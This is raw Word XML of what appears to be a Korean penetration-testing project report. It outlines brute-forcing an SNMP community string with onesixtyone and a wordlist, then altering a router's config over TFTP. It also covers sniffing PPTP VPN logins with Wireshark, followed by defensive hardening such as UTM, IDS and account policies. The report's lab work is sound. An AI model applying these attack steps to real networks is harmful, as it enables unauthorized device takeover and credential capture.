        <w:t>v1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>인 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>을 사용하고 있음,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C10F59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이렇게 보안이 취약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ommunity String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 </w:t>
      </w:r>
      <w:r w:rsidR="00C10F59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>갈취해 공격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피해 범위</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44DD4" w:rsidRDefault="00C44DD4" w:rsidP="00C44DD4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mmunity String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 알게 되면 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Router</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 여러 설정들을 공격자가 원하는 대로 수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삭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생성이 가능 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44DD4" w:rsidRPr="00C44DD4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C44DD4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C8856C" wp14:editId="77B32FA9">
            <wp:extent cx="3600000" cy="2311200"/>
            <wp:effectExtent l="0" t="0" r="63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. SNMP 취약점 공격을 위해 SNMP서비스가 실행되고 있는지 확인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1FC8335" wp14:editId="6F425281">
            <wp:extent cx="3600000" cy="2318400"/>
            <wp:effectExtent l="0" t="0" r="635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 공격을 하기 전에 dict.txt파일 확인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앞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snmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서비스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지원해주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nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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후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Community String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알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오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ionary </w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일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BCB42F5" wp14:editId="7FD48B24">
            <wp:extent cx="3600000" cy="2304000"/>
            <wp:effectExtent l="0" t="0" r="635" b="127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 onesixtyone툴과 dict.txt파일을 이용해 현재 사용중인 community string 확인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C44DD4" w:rsidRDefault="00430F0E" w:rsidP="00C44DD4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Onesixtyone </w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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dict.txt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사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Community String </w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>알아오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9D5A2F" wp14:editId="7A999616">
            <wp:extent cx="3599180" cy="2034540"/>
            <wp:effectExtent l="0" t="0" r="127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 와인을 이용해 tftp파일 켜기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70" cy="20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FAD6BE2" wp14:editId="6B10B270">
            <wp:extent cx="3599656" cy="1851660"/>
            <wp:effectExtent l="0" t="0" r="127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 공격시에 사용할 up_running_config copy_running_config 파일 확인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5" cy="18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ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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실행하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up_running_config, copy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16DF1D6" wp14:editId="11E35A17">
            <wp:extent cx="3599650" cy="1859280"/>
            <wp:effectExtent l="0" t="0" r="1270" b="762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 copy_running_config 파일을 이용해 R3의 running_config상태를 파일로 받아보기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64E7BFD" wp14:editId="0BF74C2A">
            <wp:extent cx="3599656" cy="1729740"/>
            <wp:effectExtent l="0" t="0" r="1270" b="381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 받아온 파일 확인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56" cy="17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 xml:space="preserve">Copy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tftp</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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왔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89E43FD" wp14:editId="6AA33A71">
            <wp:extent cx="3599318" cy="1844040"/>
            <wp:effectExtent l="0" t="0" r="1270" b="381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 공격이 되는지 확인하기 위해 공격 때 사용할 파일 생성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70" cy="1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4281AE7" wp14:editId="019CE2F1">
            <wp:extent cx="3599815" cy="1844040"/>
            <wp:effectExtent l="0" t="0" r="635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. up_running_config 파일을 이용해 공격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18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꾸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싶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들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Up_running_config </w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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만든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파일을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공격대상에게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보내기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630BCEC" wp14:editId="76CC9853">
            <wp:extent cx="3599815" cy="1813560"/>
            <wp:effectExtent l="0" t="0" r="63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. 확인을 위해 다시 running_config 상태를 파일로 받아보기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6B54D82" wp14:editId="046B51F7">
            <wp:extent cx="3599322" cy="1760220"/>
            <wp:effectExtent l="0" t="0" r="127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0. 받아온 파일을 확인해보면 Hostname이 바뀌어있는 것을 볼 수 있음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78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공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하기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위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다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running_config </w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상태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</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>고</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E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받아온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파일에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바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내용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제대로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적용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됐는지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확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44DD4" w:rsidRDefault="00C44DD4">
      <w:pPr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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430F0E" w:rsidRPr="00C44DD4" w:rsidRDefault="00430F0E" w:rsidP="00C44DD4">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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C44DD4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VPN Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44DD4" w:rsidRPr="001E2DD9" w:rsidRDefault="00C44DD4" w:rsidP="00C44DD4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V</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:t>PN Sniffing</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44DD4" w:rsidRDefault="001E2DD9" w:rsidP="00C44DD4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:wordWrap w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind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자가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 xml:space="preserve">사이에서 통신하는 내용을 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sniffing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">하는 </w:t>
      </w:r>
      <w:r w:rsidR="007E7475">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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피해 범위</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E2DD9" w:rsidRDefault="001E2DD9" w:rsidP="001E2DD9">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:widowControl w:val="0"/>
        <w:wordWrap w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:left="1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만약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가 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">P프로토콜을 사용 중이라면 공격자는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VPN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서버와 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>가 서로 통신하는 내용을 세부적으로 볼 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E2DD9" w:rsidRPr="001E2DD9" w:rsidRDefault="001E2DD9" w:rsidP="001E2DD9">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>모의 해킹 결과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785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D86DA66" wp14:editId="197559FE">
            <wp:extent cx="3599465" cy="2413000"/>
            <wp:effectExtent l="0" t="0" r="127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. 외부의 PC를 이용해 VPN서버에 접근 시도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95" cy="2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4CF19DD" wp14:editId="681FF5BF">
            <wp:extent cx="3599180" cy="1935480"/>
            <wp:effectExtent l="0" t="0" r="1270" b="762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 접근 성공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25" cy="19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430F0E" w:rsidRDefault="00430F0E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ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>지사의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컴퓨터를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이용해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F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>본사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VPN </w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버에</w:t>
      </w:r>
      <w:r w:rsidRPr="00430F0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접</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>속</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430F0E" w:rsidRDefault="00430F0E" w:rsidP="00430F0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:wordWrap w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:left="804"/>
        <w:jc w:val="both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DA848E" wp14:editId="261BFFB3">
            <wp:extent cx="3592975" cy="1059180"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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 와이어 샤크로 아이디와 컴퓨터이름을 알아올 수 있음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45" cy="10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Pr="001E2DD9" w:rsidRDefault="00430F0E" w:rsidP="001E2DD9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430F0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">와이어 샤크로 확인해보면 아이디와 컴퓨터 이름을 볼 수 </w:t>
      </w:r>
      <w:r w:rsidR="001E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRPr="00706A82" w:rsidRDefault="009E6C11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보안 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRPr="00E151D6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 </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11" w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">새로 구성된 토폴로지 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430F0E" w:rsidRDefault="00430F0E" w:rsidP="009E6C11">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:ind w:leftChars="0" w:left="360" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5120640" cy="4709160"/>
            <wp:effectExtent l="0" t="0" r="381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프로젝트 토폴로지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3" cy="4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0E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 xml:space="preserve">서버로 접속 시 서버 네트워크인 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10.10.200.0/24 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">대역대를 할당 받게 되어 </w:t>
      </w:r>
      <w:r>
        <w:t>VPN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서버를 별개의 네트워크로 구성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00730845" w:rsidRDefault="00730845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외부에서 들어오는 T</w:t>
      </w:r>
      <w:r>
        <w:t>raffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 검사하고 공격으로 의심되는 </w:t>
      </w:r>
      <w:r>
        <w:t>Traffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 차단하기 위해 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">UTM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>설치</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00730845" w:rsidRDefault="004F56F1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 xml:space="preserve">내부 망에 접근해 서버 네트워크로 공격이 들어오는 것을 확인하기 위해 서버 네트워크에 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">IDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>설치</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430F0E" w:rsidRDefault="00430F0E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A2D88" w:rsidRDefault="001A2D88" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11" w:rsidRPr="00E151D6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>발견된 취약점에 대한 방어</w:t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PC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">현황 </w:t>
      </w:r>
      <w:r w:rsidR="00144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>점검 보안 솔루션</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009167A9" w:rsidRPr="009167A9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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">계정 정책 </w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>암호 정책 및 계정 잠금 정책</w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009167A9" w:rsidRDefault="009167A9" w:rsidP="009167A9">
      <w:pPr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3529BA4" wp14:editId="5329AA6F">
            <wp:extent cx="2489200" cy="950614"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1905"/>
            <wp:docPr id="158" name="그림 158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02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02" cy="9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5107" wp14:editId="644C51F5">
            <wp:extent cx="2558495" cy="669749"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="159" name="그림 159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-03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2" cy="7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 xml:space="preserve">윈도우 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최대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길이 </w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">8,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번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계정 잠금 임계</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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값 초기화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분으로 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009167A9" w:rsidRDefault="009167A9" w:rsidP="009167A9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24069C60" wp14:editId="2CA9CA85">
            <wp:extent cx="4979406" cy="116403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-03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76" cy="1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07D76" wp14:editId="1ED9E379">
            <wp:extent cx="4952246" cy="474345"/>
            <wp:effectExtent l="0" t="0" r="1270" b="190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-03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44" cy="4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FD59B" wp14:editId="1E429E83">
            <wp:extent cx="4979035" cy="98191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-033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03" cy="1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48F50" wp14:editId="279AB05A">
            <wp:extent cx="5015620" cy="98912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-03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5" cy="1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ADCFF7" wp14:editId="41103489">
            <wp:extent cx="4073237" cy="1514475"/>
            <wp:effectExtent l="0" t="0" r="381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-03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0" cy="15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A9" w:rsidRPr="009167A9" w:rsidRDefault="009167A9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167A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">entOS </w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서버는 최근 암호 기억 </w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>개 계정 잠금 임계</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 값</w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>번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길이 </w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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대소문자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>숫자</w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>특수문자 포함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계정 잠금 기간 </w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>분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대 암호 사용기간 </w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>30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최소 암호 사용기간 </w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>일,</w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">암호 만료 경고 날짜는 </w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="009167A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>일전</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009167A9" w:rsidRDefault="009167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67A9" w:rsidRPr="00144CF8" w:rsidRDefault="009167A9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계정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81F98AE" wp14:editId="7F312340">
            <wp:extent cx="2574680" cy="579421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-03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8" cy="5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31DEA3" wp14:editId="6536BC59">
            <wp:extent cx="2572826" cy="588475"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="196" name="그림 196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-03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02" cy="6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C1FD9" wp14:editId="0CCE9AB5">
            <wp:extent cx="4000500" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="0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-039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8FA11B" wp14:editId="7B2442CD">
            <wp:extent cx="4000500" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="0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-038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Pr="00144CF8" w:rsidRDefault="00144CF8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계정</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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명을 쉽게 추측하기 어렵도록 변경하고 설명도 제거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원격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관리자가 사용할 계정을 별도로 생성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감사 정책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10731" wp14:editId="0CDD8978">
            <wp:extent cx="4000500" cy="1628775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="199" name="그림 199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-04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별다른 감사 정책이 설정되어 있지 않았던 윈도우 서버에서 개체 액세스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로그인 관련 감사만 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144CF8" w:rsidRPr="00144CF8" w:rsidRDefault="00144CF8" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24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t>백업 일정 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144CF8" w:rsidRDefault="00144CF8" w:rsidP="00144CF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62D1174B" wp14:editId="0A779621">
            <wp:extent cx="4404360" cy="1092551"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="200" name="그림 20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-04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82" cy="10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285790" wp14:editId="0CB3F539">
            <wp:extent cx="2514481" cy="889623"/>
            <wp:effectExtent l="0" t="0" r="635" b="635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-04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6" cy="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B18B81" wp14:editId="6C419041">
            <wp:extent cx="2435382" cy="921924"/>
            <wp:effectExtent l="0" t="0" r="317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-04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32" cy="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E62004C" wp14:editId="20B25487">
            <wp:extent cx="4933950" cy="161925"/>
            <wp:effectExtent l="0" t="0" r="0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4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43C560" wp14:editId="31F7BC1B">
            <wp:extent cx="3997960" cy="1463040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="205" name="그림 20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47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18" cy="14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8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>윈도우 서버는 볼륨 전체에 대한 백업 일정을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>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>entOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00144CF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
